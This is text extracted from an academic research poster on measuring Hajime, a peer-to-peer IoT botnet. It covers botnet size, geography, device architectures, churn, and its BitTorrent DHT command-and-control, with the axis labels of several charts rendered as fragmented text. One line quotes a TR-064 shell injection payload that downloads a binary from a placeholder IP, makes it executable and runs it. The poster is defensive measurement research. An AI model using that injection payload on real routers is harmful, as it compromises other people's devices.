0K10K20K30K40K50K60K70K80K90K

100K

01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01

Num

ber o

f dis

tinct

bot

s

Time (20-minute bins)

atk.mipseb update.i.mipseb update

0K10K20K30K40K50K60K70K80K90K

100K

01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01

Num

ber o

f dis

tinct

bot

s

Time (20-minute bins)

OthersBrazil

Iran

MexicoChina

S. India

S. KoreaUS

Turkey

RussiaIndonesia

atk.mipseb update.i.mipseb update

0K

100K

200K

300K

400K

500K

600K

BR CN IR IN KR US TR RU MX IT

Num

ber o

f dis

tinct

bot

s

Country

arm5arm6arm7mipselmipseb

unknown4M

5M

4M

5M

0K

100K

200K

300K

400K

500K

600K

BR IR MX CN IN KR US TR RU ID

Num

ber o

f dis

tinct

bot

s

Country

arm5arm6arm7mipselmipseb

unknown4M

5M

4M

5M

0

10K

20K

30K

40K

50K

60K

11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18

TR-0

64 in

ject

ion

atte

mpt

s

Time (20-minute bins)

HajimeMirai

config update.i.mipseb update

atk.mipseb update.i.mipsel update

atk.mipsel update

Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin smherwig@cs.umd.edu katura@cs.umd.edu ghughey@terpmail.umd.edu ricro@cs.umd.edu dml@cs.umd.edu

Intended Victim (non-vulnerable)

Shell Injection DNS Lookup

NTPServer=`cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`

Exploits

Botnet Size

Location

Devices

BitTorrent DHT

DatasetsDHT ScansuTP Scans (10.5M keys)Binary reverse engineering (52 payloads)

Bot IP = 1.2.3.4 D-root

Chimay-RedGPON shell injection

TR-064 shell injectionDNS Backscatter (125M queries)

HajimeMirai successorRuns on many architecturesRegular updates, new exploits

Goals To inform defenses and intervention: characterize steady-state behavior understand effect of new exploits on botnet

Churn

0K

5K

10K

15K

20K

25K

30K

35K

40K

45K

01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01

Num

ber o

f birt

hs a

nd d

eath

s

Time (20-minute bins)

atk.mipseb update.i.mipseb update

birthsdeaths

Steady-state churn: 2K Median bot lifetime: 5 hours

The GPON exploit disproportionately affects Mexico

Chimay-Red increases proportion of MikroTik bots from 0.79% to 80.29%.GPON exploit changes Mexico from primarily ARM to MIPS.

74.2% of bot devices are MIPS big endian.

Exploit Effects

Devices overwhelmingly run MIPSSteady-state of ~40K bots

52.5% of bots are in Brazil

Russia goes from 500 active bots per hour to 6K following Chimay-Red.

Evolution of TR-064 Exploit

Miraideployment

Hajimetesting

Hajime deployment

uTP

Sess

ion

Non-vulnerable hosts interpret this as a hostname with an unfamiliar TLD (./X`)

Learns attacking bots’IP addresses

Announce“I have ” Who has

Repeated Getsconstruct the entire setof bots with a given fileGet

“Who has ”

1

2

3

Hajime uses BitTorrent’s DHT for Command-and-Control

Peaks of 95K after Chimay-Red and GPON exploits

IoT Botnets Pose a Major Threat

Reboots and reinfectionsare common

⇒

We are longitudinally measuring Hajime

uTP SessionuTP SessionuTP SessionuTP handshakes yieldper-bot long-lived keys

The geographic makeup of IoT botnets can change rapidly

Mirai Largest DoSattacks inhistory